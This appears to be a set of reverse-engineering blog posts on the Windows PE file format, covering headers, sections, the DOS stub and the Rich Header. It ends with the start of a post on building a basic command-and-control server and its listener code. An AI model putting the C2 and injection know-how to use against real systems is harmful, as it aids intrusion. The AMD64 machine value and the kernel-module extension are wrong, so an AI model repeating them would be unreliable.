Sections are the containers of the actual data of the executable file, they occupy the rest of the PE file after the headers, precisely after the section headers.
Some sections have special names that indicate their purpose, we’ll go over some of them, and a full list of these names can be found on the official Microsoft documentation under the “Special Sections” section.

  • .text: Contains the executable code of the program.
  • .data: Contains the initialized data.
  • .bss: Contains uninitialized data.
  • .rdata: Contains read-only initialized data.
  • .edata: Contains the export tables.
  • .idata: Contains the import tables.
  • .reloc: Contains image relocation information.
  • .rsrc: Contains resources used by the program, these include images, icons or even embedded binaries.
  • .tls: (Thread Local Storage), provides storage for every executing thread of the program.

Section Headers

After the Optional Header and before the sections comes the Section Headers. These headers contain information about the sections of the PE file.

A Section Header is a structure named IMAGE_SECTION_HEADER defined in winnt.h as follows:

typedef struct _IMAGE_SECTION_HEADER {
    BYTE    Name[IMAGE_SIZEOF_SHORT_NAME];
    union {
            DWORD   PhysicalAddress;
            DWORD   VirtualSize;
    } Misc;
    DWORD   VirtualAddress;
    DWORD   SizeOfRawData;
    DWORD   PointerToRawData;
    DWORD   PointerToRelocations;
    DWORD   PointerToLinenumbers;
    WORD    NumberOfRelocations;
    WORD    NumberOfLinenumbers;
    DWORD   Characteristics;
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
  • Name: First field of the Section Header, a byte array of the size IMAGE_SIZEOF_SHORT_NAME that holds the name of the section. IMAGE_SIZEOF_SHORT_NAME has the value of 8 meaning that a section name can’t be longer than 8 characters. For longer names the official documentation mentions a work-around by filling this field with an offset in the string table, however executable images do not use a string table so this limitation of 8 characters holds for executable images.
  • PhysicalAddress or VirtualSize: A union defines multiple names for the same thing, this field contains the total size of the section when it’s loaded in memory.
  • VirtualAddress: The documentation states that for executable images this field holds the address of the first byte of the section relative to the image base when loaded in memory, and for object files it holds the address of the first byte of the section before relocation is applied.
  • SizeOfRawData: This field contains the size of the section on disk, it must be a multiple of IMAGE_OPTIONAL_HEADER.FileAlignment.
    SizeOfRawData and VirtualSize can be different, we’ll discuss the reason for this later in the post.
  • PointerToRawData: A pointer to the first page of the section within the file, for executable images it must be a multiple of IMAGE_OPTIONAL_HEADER.FileAlignment.
  • PointerToRelocations: A file pointer to the beginning of relocation entries for the section. It’s set to 0 for executable files.
  • PointerToLineNumbers: A file pointer to the beginning of COFF line-number entries for the section. It’s set to 0 because COFF debugging information is deprecated.
  • NumberOfRelocations: The number of relocation entries for the section, it’s set to 0 for executable images.
  • NumberOfLinenumbers: The number of COFF line-number entries for the section, it’s set to 0 because COFF debugging information is deprecated.
  • Characteristics: Flags that describe the characteristics of the section.
    These characteristics are things like if the section contains executable code, contains initialized/uninitialized data, can be shared in memory.
    A complete list of section characteristics flags can be found on the official Microsoft documentation.

SizeOfRawData and VirtualSize can be different, and this can happen for multiple of reasons.

SizeOfRawData must be a multiple of IMAGE_OPTIONAL_HEADER.FileAlignment, so if the section size is less than that value the rest gets padded and SizeOfRawData gets rounded to the nearest multiple of IMAGE_OPTIONAL_HEADER.FileAlignment.
However when the section is loaded into memory it doesn’t follow that alignment and only the actual size of the section is occupied.
In this case SizeOfRawData will be greater than VirtualSize

The opposite can happen as well.
If the section contains uninitialized data, these data won’t be accounted for on disk, but when the section gets mapped into memory, the section will expand to reserve memory space for when the uninitialized data gets later initialized and used.
This means that the section on disk will occupy less than it will do in memory, in this case VirtualSize will be greater than SizeOfRawData.

Here’s the view of Section Headers in PE-bear:

We can see Raw Addr. and Virtual Addr. fields which correspond to IMAGE_SECTION_HEADER.PointerToRawData and IMAGE_SECTION_HEADER.VirtualAddress.

Raw Size and Virtual Size correspond to IMAGE_SECTION_HEADER.SizeOfRawData and IMAGE_SECTION_HEADER.VirtualSize.
We can see how these two fields are used to calculate where the section ends, both on disk and in memory.
For example if we take the .text section, it has a raw address of 0x400 and a raw size of 0xE00, if we add them together we get 0x1200 which is displayed as the section end on disk.
Similarly we can do the same with virtual size and address, virtual address is 0x1000 and virtual size is 0xD2C, if we add them together we get 0x1D2C.

The Characteristics field marks some sections as read-only, some other sections as read-write and some sections as readable and executable.

PointerToRelocations, NumberOfRelocations and NumberOfLinenumbers are set to 0 as expected.


Conclusion

That’s it for this post, we’ve discussed what Data Directories are and we talked about sections.
The next post will be about PE imports.
Thanks for reading.

A dive into the PE file format - PE file structure - Part 3: NT Headers

By: 0xRick
24 October 2021 at 01:00

A dive into the PE file format - PE file structure - Part 3: NT Headers

Introduction

In the previous post we looked at the structure of the DOS header and we reversed the DOS stub.

In this post we’re going to talk about the NT Headers part of the PE file structure.

Before we get into the post, we need to talk about an important concept that we’re going to see a lot, and that is the concept of a Relative Virtual Address or an RVA. An RVA is just an offset from where the image was loaded in memory (the Image Base). So to translate an RVA into an absolute virtual address you need to add the value of the RVA to the value of the Image Base. PE files rely heavily on the use of RVAs as we’ll see later.


NT Headers (IMAGE_NT_HEADERS)

NT headers is a structure defined in winnt.h as IMAGE_NT_HEADERS, by looking at its definition we can see that it has three members, a DWORD signature, an IMAGE_FILE_HEADER structure called FileHeader and an IMAGE_OPTIONAL_HEADER structure called OptionalHeader.
It’s worth mentioning that this structure is defined in two different versions, one for 32-bit executables (Also named PE32 executables) named IMAGE_NT_HEADERS and one for 64-bit executables (Also named PE32+ executables) named IMAGE_NT_HEADERS64.
The main difference between the two versions is the used version of IMAGE_OPTIONAL_HEADER structure which has two versions, IMAGE_OPTIONAL_HEADER32 for 32-bit executables and IMAGE_OPTIONAL_HEADER64 for 64-bit executables.

typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

typedef struct _IMAGE_NT_HEADERS {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} IMAGE_NT_HEADERS32, *PIMAGE_NT_HEADERS32;

Signature

First member of the NT headers structure is the PE signature, it’s a DWORD which means that it occupies 4 bytes.
It always has a fixed value of 0x50450000 which translates to PE\0\0 in ASCII.

Here’s a screenshot from PE-bear showing the PE signature:

File Header (IMAGE_FILE_HEADER)

Also called “The COFF File Header”, the File Header is a structure that holds some information about the PE file.
It’s defined as IMAGE_FILE_HEADER in winnt.h, here’s the definition:

typedef struct _IMAGE_FILE_HEADER {
    WORD    Machine;
    WORD    NumberOfSections;
    DWORD   TimeDateStamp;
    DWORD   PointerToSymbolTable;
    DWORD   NumberOfSymbols;
    WORD    SizeOfOptionalHeader;
    WORD    Characteristics;
} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;

It’s a simple structure with 7 members:

  • Machine: This is a number that indicates the type of machine (CPU Architecture) the executable is targeting, this field can have a lot of values, but we’re only interested in two of them, 0x8864 for AMD64 and 0x14c for i386. For a complete list of possible values you can check the official Microsoft documentation.
  • NumberOfSections: This field holds the number of sections (or the number of section headers aka. the size of the section table.).
  • TimeDateStamp: A unix timestamp that indicates when the file was created.
  • PointerToSymbolTable and NumberOfSymbols: These two fields hold the file offset to the COFF symbol table and the number of entries in that symbol table, however they get set to 0 which means that no COFF symbol table is present, this is done because the COFF debugging information is deprecated.
  • SizeOfOptionalHeader: The size of the Optional Header.
  • Characteristics: A flag that indicates the attributes of the file, these attributes can be things like the file being executable, the file being a system file and not a user program, and a lot of other things. A complete list of these flags can be found on the official Microsoft documentation.

Here’s the File Header contents of an actual PE file:

Optional Header (IMAGE_OPTIONAL_HEADER)

The Optional Header is the most important header of the NT headers, the PE loader looks for specific information provided by that header to be able to load and run the executable.
It’s called the optional header because some file types like object files don’t have it, however this header is essential for image files.
It doesn’t have a fixed size, that’s why the IMAGE_FILE_HEADER.SizeOfOptionalHeader member exists.

The first 8 members of the Optional Header structure are standard for every implementation of the COFF file format, the rest of the header is an extension to the standard COFF optional header defined by Microsoft, these additional members of the structure are needed by the Windows PE loader and linker.

As mentioned earlier, there are two versions of the Optional Header, one for 32-bit executables and one for 64-bit executables.
The two versions are different in two aspects:

  • The size of the structure itself (or the number of members defined within the structure): IMAGE_OPTIONAL_HEADER32 has 31 members while IMAGE_OPTIONAL_HEADER64 only has 30 members, that additional member in the 32-bit version is a DWORD named BaseOfData which holds an RVA of the beginning of the data section.
  • The data type of some of the members: The following 5 members of the Optional Header structure are defined as DWORD in the 32-bit version and as ULONGLONG in the 64-bit version:
    • ImageBase
    • SizeOfStackReserve
    • SizeOfStackCommit
    • SizeOfHeapReserve
    • SizeOfHeapCommit

Let’s take a look at the definition of both structures.

typedef struct _IMAGE_OPTIONAL_HEADER {
    //
    // Standard fields.
    //

    WORD    Magic;
    BYTE    MajorLinkerVersion;
    BYTE    MinorLinkerVersion;
    DWORD   SizeOfCode;
    DWORD   SizeOfInitializedData;
    DWORD   SizeOfUninitializedData;
    DWORD   AddressOfEntryPoint;
    DWORD   BaseOfCode;
    DWORD   BaseOfData;

    //
    // NT additional fields.
    //

    DWORD   ImageBase;
    DWORD   SectionAlignment;
    DWORD   FileAlignment;
    WORD    MajorOperatingSystemVersion;
    WORD    MinorOperatingSystemVersion;
    WORD    MajorImageVersion;
    WORD    MinorImageVersion;
    WORD    MajorSubsystemVersion;
    WORD    MinorSubsystemVersion;
    DWORD   Win32VersionValue;
    DWORD   SizeOfImage;
    DWORD   SizeOfHeaders;
    DWORD   CheckSum;
    WORD    Subsystem;
    WORD    DllCharacteristics;
    DWORD   SizeOfStackReserve;
    DWORD   SizeOfStackCommit;
    DWORD   SizeOfHeapReserve;
    DWORD   SizeOfHeapCommit;
    DWORD   LoaderFlags;
    DWORD   NumberOfRvaAndSizes;
    IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32;
typedef struct _IMAGE_OPTIONAL_HEADER64 {
    WORD        Magic;
    BYTE        MajorLinkerVersion;
    BYTE        MinorLinkerVersion;
    DWORD       SizeOfCode;
    DWORD       SizeOfInitializedData;
    DWORD       SizeOfUninitializedData;
    DWORD       AddressOfEntryPoint;
    DWORD       BaseOfCode;
    ULONGLONG   ImageBase;
    DWORD       SectionAlignment;
    DWORD       FileAlignment;
    WORD        MajorOperatingSystemVersion;
    WORD        MinorOperatingSystemVersion;
    WORD        MajorImageVersion;
    WORD        MinorImageVersion;
    WORD        MajorSubsystemVersion;
    WORD        MinorSubsystemVersion;
    DWORD       Win32VersionValue;
    DWORD       SizeOfImage;
    DWORD       SizeOfHeaders;
    DWORD       CheckSum;
    WORD        Subsystem;
    WORD        DllCharacteristics;
    ULONGLONG   SizeOfStackReserve;
    ULONGLONG   SizeOfStackCommit;
    ULONGLONG   SizeOfHeapReserve;
    ULONGLONG   SizeOfHeapCommit;
    DWORD       LoaderFlags;
    DWORD       NumberOfRvaAndSizes;
    IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64;
  • Magic: Microsoft documentation describes this field as an integer that identifies the state of the image, the documentation mentions three common values:

    • 0x10B: Identifies the image as a PE32 executable.
    • 0x20B: Identifies the image as a PE32+ executable.
    • 0x107: Identifies the image as a ROM image.

    The value of this field is what determines whether the executable is 32-bit or 64-bit, IMAGE_FILE_HEADER.Machine is ignored by the Windows PE loader.

  • MajorLinkerVersion and MinorLinkerVersion: The linker major and minor version numbers.

  • SizeOfCode: This field holds the size of the code (.text) section, or the sum of all code sections if there are multiple sections.

  • SizeOfInitializedData: This field holds the size of the initialized data (.data) section, or the sum of all initialized data sections if there are multiple sections.

  • SizeOfUninitializedData: This field holds the size of the uninitialized data (.bss) section, or the sum of all uninitialized data sections if there are multiple sections.

  • AddressOfEntryPoint: An RVA of the entry point when the file is loaded into memory. The documentation states that for program images this relative address points to the starting address and for device drivers it points to initialization function. For DLLs an entry point is optional, and in the case of entry point absence the AddressOfEntryPoint field is set to 0.

  • BaseOfCode: An RVA of the start of the code section when the file is loaded into memory.

  • BaseOfData (PE32 Only): An RVA of the start of the data section when the file is loaded into memory.

  • ImageBase: This field holds the preferred address of the first byte of image when loaded into memory (the preferred base address), this value must be a multiple of 64K. Due to memory protections like ASLR, and a lot of other reasons, the address specified by this field is almost never used, in this case the PE loader chooses an unused memory range to load the image into, after loading the image into that address the loader goes into a process called the relocating where it fixes the constant addresses within the image to work with the new image base, there’s a special section that holds information about places that will need fixing if relocation is needed, that section is called the relocation section (.reloc), more on that in the upcoming posts.

  • SectionAlignment: This field holds a value that gets used for section alignment in memory (in bytes), sections are aligned in memory boundaries that are multiples of this value. The documentation states that this value defaults to the page size for the architecture and it can’t be less than the value of FileAlignment.

  • FileAlignment: Similar to SectionAligment this field holds a value that gets used for section raw data alignment on disk (in bytes), if the size of the actual data in a section is less than the FileAlignment value, the rest of the chunk gets padded with zeroes to keep the alignment boundaries. The documentation states that this value should be a power of 2 between 512 and 64K, and if the value of SectionAlignment is less than the architecture’s page size then the sizes of FileAlignment and SectionAlignment must match.

  • MajorOperatingSystemVersion, MinorOperatingSystemVersion, MajorImageVersion, MinorImageVersion, MajorSubsystemVersion and MinorSubsystemVersion: These members of the structure specify the major version number of the required operating system, the minor version number of the required operating system, the major version number of the image, the minor version number of the image, the major version number of the subsystem and the minor version number of the subsystem respectively.

  • Win32VersionValue: A reserved field that the documentation says should be set to 0.

  • SizeOfImage: The size of the image file (in bytes), including all headers. It gets rounded up to a multiple of SectionAlignment because this value is used when loading the image into memory.

  • SizeOfHeaders: The combined size of the DOS stub, PE header (NT Headers), and section headers rounded up to a multiple of FileAlignment.

  • CheckSum: A checksum of the image file, it’s used to validate the image at load time.

  • Subsystem: This field specifies the Windows subsystem (if any) that is required to run the image, A complete list of the possible values of this field can be found on the official Microsoft documentation.

  • DLLCharacteristics: This field defines some characteristics of the executable image file, like if it’s NX compatible and if it can be relocated at run time. I have no idea why it’s named DLLCharacteristics, it exists within normal executable image files and it defines characteristics that can apply to normal executable files. A complete list of the possible flags for DLLCharacteristics can be found on the official Microsoft documentation.

  • SizeOfStackReserve, SizeOfStackCommit, SizeOfHeapReserve and SizeOfHeapCommit: These fields specify the size of the stack to reserve, the size of the stack to commit, the size of the local heap space to reserve and the size of the local heap space to commit respectively.

  • LoaderFlags: A reserved field that the documentation says should be set to 0.

  • NumberOfRvaAndSizes : Size of the DataDirectory array.

  • DataDirectory: An array of IMAGE_DATA_DIRECTORY structures. We will talk about this in the next post.

Let’s take a look at the Optional Header contents of an actual PE file.

We can talk about some of these fields, first one being the Magic field at the start of the header, it has the value 0x20B meaning that this is a PE32+ executable.

We can see that the entry point RVA is 0x12C4 and the code section start RVA is 0x1000, it follows the alignment defined by the SectionAlignment field which has the value of 0x1000.

File alignment is set to 0x200, and we can verify this by looking at any of the sections, for example the data section:

As you can see, the actual contents of the data section are from 0x2200 to 0x2229, however the rest of the section is padded until 0x23FF to comply with the alignment defined by FileAlignment.

SizeOfImage is set to 7000 and SizeOfHeaders is set to 400, both are multiples of SectionAlignment and FileAlignment respectively.

The Subsystem field is set to 3 which is the Windows console, and that makes sense because the program is a console application.

I didn’t include the DataDirectory in the optional header contents screenshot because we still haven’t talked about it yet.


Conclusion

We’ve reached the end of this post. In summary we looked at the NT Headers structure, and we discussed the File Header and Optional Header structures in detail.
In the next post we will take a look at the Data Directories, the Section Headers, and the sections.
Thanks for reading.

A dive into the PE file format - PE file structure - Part 2: DOS Header, DOS Stub and Rich Header

By: 0xRick
22 October 2021 at 01:02

A dive into the PE file format - PE file structure - Part 2: DOS Header, DOS Stub and Rich Header

Introduction

In the previous post we looked at a high level overview of the PE file structure, in this post we’re going to talk about the first two parts which are the DOS Header and the DOS Stub.

The PE viewer I’m going to use throughout the series is called PE-bear, it’s full of features and has a good UI.


DOS Header

Overview

The DOS header (also called the MS-DOS header) is a 64-byte-long structure that exists at the start of the PE file.
it’s not important for the functionality of PE files on modern Windows systems, however it’s there because of backward compatibility reasons.
This header makes the file an MS-DOS executable, so when it’s loaded on MS-DOS the DOS stub gets executed instead of the actual program.
Without this header, if you attempt to load the executable on MS-DOS it will not be loaded and will just produce a generic error.

Structure

As mentioned before, it’s a 64-byte-long structure, we can take a look at the contents of that structure by looking at the IMAGE_DOS_HEADER structure definition from winnt.h:

typedef struct _IMAGE_DOS_HEADER {      // DOS .EXE header
    WORD   e_magic;                     // Magic number
    WORD   e_cblp;                      // Bytes on last page of file
    WORD   e_cp;                        // Pages in file
    WORD   e_crlc;                      // Relocations
    WORD   e_cparhdr;                   // Size of header in paragraphs
    WORD   e_minalloc;                  // Minimum extra paragraphs needed
    WORD   e_maxalloc;                  // Maximum extra paragraphs needed
    WORD   e_ss;                        // Initial (relative) SS value
    WORD   e_sp;                        // Initial SP value
    WORD   e_csum;                      // Checksum
    WORD   e_ip;                        // Initial IP value
    WORD   e_cs;                        // Initial (relative) CS value
    WORD   e_lfarlc;                    // File address of relocation table
    WORD   e_ovno;                      // Overlay number
    WORD   e_res[4];                    // Reserved words
    WORD   e_oemid;                     // OEM identifier (for e_oeminfo)
    WORD   e_oeminfo;                   // OEM information; e_oemid specific
    WORD   e_res2[10];                  // Reserved words
    LONG   e_lfanew;                    // File address of new exe header
  } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

This structure is important to the PE loader on MS-DOS, however only a few members of it are important to the PE loader on Windows Systems, so we’re not going to cover everything in here, just the important members of the structure.

  • e_magic: This is the first member of the DOS Header, it’s a WORD so it occupies 2 bytes, it’s usually called the magic number. It has a fixed value of 0x5A4D or MZ in ASCII, and it serves as a signature that marks the file as an MS-DOS executable.
  • e_lfanew: This is the last member of the DOS header structure, it’s located at offset 0x3C into the DOS header and it holds an offset to the start of the NT headers. This member is important to the PE loader on Windows systems because it tells the loader where to look for the file header.

The following picture shows contents of the DOS header in an actual PE file using PE-bear:

As you can see, the first member of the header is the magic number with the fixed value we talked about which was 5A4D.
The last member of the header (at offset 0x3C) is given the name “File address of new exe header”, it has the value 100, we can follow to that offset and we’ll find the start of the NT headers as expected:


DOS Stub

Overview

The DOS stub is an MS-DOS program that prints an error message saying that the executable is not compatible with DOS then exits.
This is what gets executed when the program is loaded in MS-DOS, the default error message is “This program cannot be run in DOS mode.”, however this message can be changed by the user during compile time.

That’s all we need to know about the DOS stub, we don’t really care about it, but let’s take a look at what it’s doing just for fun.

Analysis

To be able to disassemble the machine code of the DOS stub, I copied the code of the stub from PE-bear, then I created a new file with the stub contents using a hex editor (HxD) and gave it the name dos-stub.exe.

Stub code:

0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68
69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 
74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 
6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00

After that I used IDA to disassemble the executable, MS-DOS programs are 16-bit programs, so I chose the intel 8086 processor type and the 16-bit disassembly mode.

It’s a fairly simple program, let’s step through it line by line:

seg000:0000                 push    cs
seg000:0001                 pop     ds

First line pushes the value of cs onto the stack and the second line pops that value from the top of stack into ds. This is just a way of setting the value of the data segment to the same value as the code segment.

seg000:0002                 mov     dx, 0Eh
seg000:0005                 mov     ah, 9
seg000:0007                 int     21h             ; DOS - PRINT STRING
seg000:0007                                         ; DS:DX -> string terminated by "$"

These three lines are responsible for printing the error message, first line sets dx to the address of the string “This program cannot be run in DOS mode.” (0xe), second line sets ah to 9 and the last line invokes interrupt 21h.

Interrupt 21h is a DOS interrupt (API call) that can do a lot of things, it takes a parameter that determines what function to execute and that parameter is passed in the ah register.
We see here that the value 9 is given to the interrupt, 9 is the code of the function that prints a string to the screen, that function takes a parameter which is the address of the string to print, that parameter is passed in the dx register as we can see in the code.

Information about the DOS API can be found on wikipedia.

seg000:0009                 mov     ax, 4C01h
seg000:000C                 int     21h             ; DOS - 2+ - QUIT WITH EXIT CODE (EXIT)
seg000:000C                                         ; AL = exit code

The last three lines of the program are again an interrupt 21h call, this time there’s a mov instruction that puts 0X4C01 into ax, this sets al to 0x01 and ah to 0x4c.

0x4c is the function code of the function that exits with an error code, it takes the error code from al, which in this case is 1.

So in summary, all the DOS stub is doing is print the error message then exit with code 1.


Rich Header

So now we’ve seen the DOS Header and the DOS Stub, however there’s still a chunk of data we haven’t talked about lying between the DOS Stub and the start of the NT Headers.

This chunk of data is commonly referred to as the Rich Header, it’s an undocumented structure that’s only present in executables built using the Microsoft Visual Studio toolset.
This structure holds some metadata about the tools used to build the executable like their names or types and their specific versions and build numbers.

All of the resources I have read about PE files didn’t mention this structure, however when searching about the Rich Header itself I found a decent amount of resources, and that makes sense because the Rich Header is not actually a part of the PE file format structure and can be completely zeroed-out without interfering with the executable’s functionality, it’s just something that Microsoft adds to any executable built using their Visual Studio toolset.

I only know about the Rich Header because I’ve read the reports on the Olympic Destroyer malware, and for those who don’t know what Olympic Destroyer is, it’s a malware that was written and used by a threat group in an attempt to disrupt the 2018 Winter Olympics.
This piece of malware is known for having a lot of false flags that were intentionally put to cause confusion and misattribution, one of the false flags present there was a Rich Header.
The authors of the malware overwrote the original Rich Header in the malware executable with the Rich Header of another malware attributed to the Lazarus threat group to make it look like it was Lazarus.
You can check Kaspersky’s report for more information about this.

The Rich Header consists of a chunk of XORed data followed by a signature (Rich) and a 32-bit checksum value that is the XOR key.
The encrypted data consists of a DWORD signature DanS, 3 zeroed-out DWORDs for padding, then pairs of DWORDS each pair representing an entry, and each entry holds a tool name, its build number and the number of times it’s been used.
In each DWORD pair the first pair holds the type ID or the product ID in the high WORD and the build ID in the low WORD, the second pair holds the use count.

PE-bear parses the Rich Header automatically:

As you can see the DanS signature is the first thing in the structure, then there are 3 zeroed-out DWORDs and after that comes the entries.
We can also see the corresponding tools and Visual Studio versions of the product and build IDs.

As an exercise I wrote a script to parse this header myself, it’s a very simple process, all we need to do is to XOR the data, then read the entry pairs and translate them.

Rich Header data:

7E 13 87 AA 3A 72 E9 F9 3A 72 E9 F9 3A 72 E9 F9
33 0A 7A F9 30 72 E9 F9 F1 1D E8 F8 38 72 E9 F9 
F1 1D EC F8 2B 72 E9 F9 F1 1D ED F8 30 72 E9 F9 
F1 1D EA F8 39 72 E9 F9 61 1A E8 F8 3F 72 E9 F9 
3A 72 E8 F9 0A 72 E9 F9 BC 02 E0 F8 3B 72 E9 F9 
BC 02 16 F9 3B 72 E9 F9 BC 02 EB F8 3B 72 E9 F9 
52 69 63 68 3A 72 E9 F9 00 00 00 00 00 00 00 00

Script:

import textwrap

def xor(data, key):
	return bytearray( ((data[i] ^ key[i % len(key)]) for i in range(0, len(data))) )

def rev_endiannes(data):
	tmp = [data[i:i+8] for i in range(0, len(data), 8)]
	
	for i in range(len(tmp)):
		tmp[i] = "".join(reversed([tmp[i][x:x+2] for x in range(0, len(tmp[i]), 2)]))
	
	return "".join(tmp)

data = bytearray.fromhex("7E1387AA3A72E9F93A72E9F93A72E9F9330A7AF93072E9F9F11DE8F83872E9F9F11DECF82B72E9F9F11DEDF83072E9F9F11DEAF83972E9F9611AE8F83F72E9F93A72E8F90A72E9F9BC02E0F83B72E9F9BC0216F93B72E9F9BC02EBF83B72E9F9")
key  = bytearray.fromhex("3A72E9F9")

rch_hdr = (xor(data,key)).hex()
rch_hdr = textwrap.wrap(rch_hdr, 16)

for i in range(2,len(rch_hdr)):
	tmp = textwrap.wrap(rch_hdr[i], 8)
	f1 = rev_endiannes(tmp[0])
	f2 = rev_endiannes(tmp[1])
	print("{} {} : {}.{}.{}".format(f1, f2, str(int(f1[4:],16)), str(int(f1[0:4],16)), str(int(f2,16)) ))

Please note that I had to reverse the byte-order because the data was presented in little-endian.

After running the script we can see an output that’s identical to PE-bear’s interpretation, meaning that the script works fine.

Translating these values into the actual tools types and versions is a matter of collecting the values from actual Visual Studio installations.
I checked the source code of bearparser (the parser used in PE-bear) and I found comments mentioning where these values were collected from.

//list from: https://github.com/kirschju/richheader
//list based on: https://github.com/kirschju/richheader + pnx's notes

You can check the source code for yourself, it’s on hasherezade’s (PE-bear author) Github page.


Conclusion

In this post we talked about the first two parts of the PE file, the DOS header and the DOS stub, we looked at the members of the DOS header structure and we reversed the DOS stub program.
We also looked at the Rich Header, a structure that’s not essentially a part of the PE file format but was worth checking.

The following image summarizes what we’ve talked about in this post:

A dive into the PE file format - PE file structure - Part 1: Overview

By: 0xRick
22 October 2021 at 01:01

A dive into the PE file format - PE file structure - Part 1: Overview

Introduction

The aim of this post is to provide a basic introduction to the PE file structure without talking about any details.


PE files

PE stands for Portable Executable, it’s a file format for executables used in Windows operating systems, it’s based on the COFF file format (Common Object File Format).

Not only .exe files are PE files, dynamic link libraries (.dll), Kernel modules (.srv), Control panel applications (.cpl) and many others are also PE files.

A PE file is a data structure that holds information necessary for the OS loader to be able to load that executable into memory and execute it.


Structure Overview

A typical PE file follows the structure outlined in the following figure:

If we open an executable file with PE-bear we’ll see the same thing:

DOS Header

Every PE file starts with a 64-bytes-long structure called the DOS header, it’s what makes the PE file an MS-DOS executable.

DOS Stub

After the DOS header comes the DOS stub which is a small MS-DOS 2.0 compatible executable that just prints an error message saying “This program cannot be run in DOS mode” when the program is run in DOS mode.

NT Headers

The NT Headers part contains three main parts:

  • PE signature: A 4-byte signature that identifies the file as a PE file.
  • File Header: A standard COFF File Header. It holds some information about the PE file.
  • Optional Header: The most important header of the NT Headers, its name is the Optional Header because some files like object files don’t have it, however it’s required for image files (files like .exe files). This header provides important information to the OS loader.

Section Table

The section table follows the Optional Header immediately, it is an array of Image Section Headers, there’s a section header for every section in the PE file.
Each header contains information about the section it refers to.

Sections

Sections are where the actual contents of the file are stored, these include things like data and resources that the program uses, and also the actual code of the program, there are several sections each one with its own purpose.


Conclusion

In this post we looked at a very basic overview of the PE file structure and talked briefly about the main parts of a PE files.
In the upcoming posts we’ll talk about each one of these parts in much more detail.

A dive into the PE file format - Introduction

By: 0xRick
22 October 2021 at 01:00

A dive into the PE file format - Introduction

What is this ?

This is going to be a series of blog posts covering PE files in depth, it’s going to include a range of different topics, mainly the structure of PE files on disk and the way PE files get mapped and loaded into memory, we’ll also discuss applying that knowledge into building proof-of-concepts like PE parsers, packers and loaders, and also proof-of-concepts for some of the memory injection techniques that require this kind of knowledge, techniques like PE injection, process hollowing, dll reflective injection etc..

Why ?

The more I got into reverse engineering or malware development the more I found that knowledge about the PE file format is absolutely essential, I already knew the basics about PE files but I never learned about them properly.

Lately I have decided to learn about PE files, so the upcoming series of posts is going to be a documentation of what I’ve learned.

These posts are not going to cover anything new, there are a lot of resources that talk about the same thing, also the techniques that are going to be covered later have been known for some time. The goal is not to present anything new, the goal is to form a better understanding of things that already exist.

Contribution

If you’d like to add anything or if you found a mistake that needs correction feel free to contact me. Contact information can be found in the about page.

Update:

File structure - part 1: Overview
File structure - part 2: DOS Header, DOS Stub and Rich Header
File structure - part 3: NT Headers
File structure - part 4: Data Directories, Section Headers and Sections
File structure - part 5: PE Imports (Import Directory Table, ILT, IAT)
File structure - part 6: PE Base Relocations
File structure - lab1: Writing a PE Parser

Building a Basic C2

By: 0xRick
16 April 2020 at 01:00

Introduction

It’s very common that after successful exploitation an attacker would put an agent that maintains communication with a c2 server on the compromised system, and the reason for that is very simple, having an agent that provides persistency over large periods and almost all the capabilities an attacker would need to perform lateral movement and other post-exploitation actions is better than having a reverse shell for example. There are a lot of free open source post-exploitation toolsets that provide this kind of capability, like Metasploit, Empire and many others, and even if you only play CTFs it’s most likely that you have used one of those before.

Long story short, I only had a general idea about how these tools work and I wanted to understand the internals of them, so I decided to try and build one on my own. For the last three weeks, I have been searching and coding, and I came up with a very basic implementation of a c2 server and an agent. In this blog post I’m going to explain the approaches I took to build the different pieces of the tool.

Please keep in mind that some of these approaches might not be the best and also the code might be kind of messy, If you have any suggestions for improvements feel free to contact me, I’d like to know what better approaches I could take. I also like to point out that this is not a tool to be used in real engagements, besides only doing basic actions like executing cmd and powershell, I didn’t take in consideration any opsec precautions.

This tool is still a work in progress, I finished the base but I’m still going to add more execution methods and more capabilities to the agent. After adding new features I will keep writing posts similar to this one, so that people with more experience give feedback and suggest improvements, while people with less experience learn.

You can find the tool on github.

Overview

About c2 servers / agents

As far as I know,

A basic c2 server should be able to:

  • Start and stop listeners.
  • Generate payloads.
  • Handle agents and task them to do stuff.

An agent should be able to:

  • Download and execute its tasks.
  • Send results.
  • Persist.

A listener should be able to:

  • Handle multiple agents.
  • Host files.

And all communications should be encrypted.

About the Tool

The server itself is written in python3, I wrote two agents, one in c++ and the other in powershell, listeners are http listeners.

I couldn’t come up with a nice name so I would appreciate suggestions.

Listeners

Basic Info

Listeners are the core functionality of the server because they provide the way of communication between the server and the agents. I decided to use http listeners, and I used flask to create the listener application.

A Listener object is instantiated with a name, a port and an IP address to bind to:

class Listener:    

    def __init__(self, name, port, ipaddress):
        
        self.name       = name
        self.port       = port
        self.ipaddress  = ipaddress
        ...

Then it creates the needed directories to store files, and other data like the encryption key and agents’ data:

...	
    	
self.Path       = "data/listeners/{}/".format(self.name)
self.keyPath    = "{}key".format(self.Path)
self.filePath   = "{}files/".format(self.Path)
self.agentsPath = "{}agents/".format(self.Path)
        
...
        
if os.path.exists(self.Path) == False:
    os.mkdir(self.Path)

if os.path.exists(self.agentsPath) == False:
    os.mkdir(self.agentsPath)

if os.path.exists(self.filePath) == False:
    os.mkdir(self.filePath)

...

After that it creates a key, saves it and stores it in a variable (more on generateKey() in the encryption part):

...
    
if os.path.exists(self.keyPath) == False:
    
    key      = generateKey()
    self.key = key
    
    with open(self.keyPath, "wt") as f:
        f.write(key)
else:
    with open(self.keyPath, "rt") as f:
        self.key = f.read()
            
...

The Flask Application

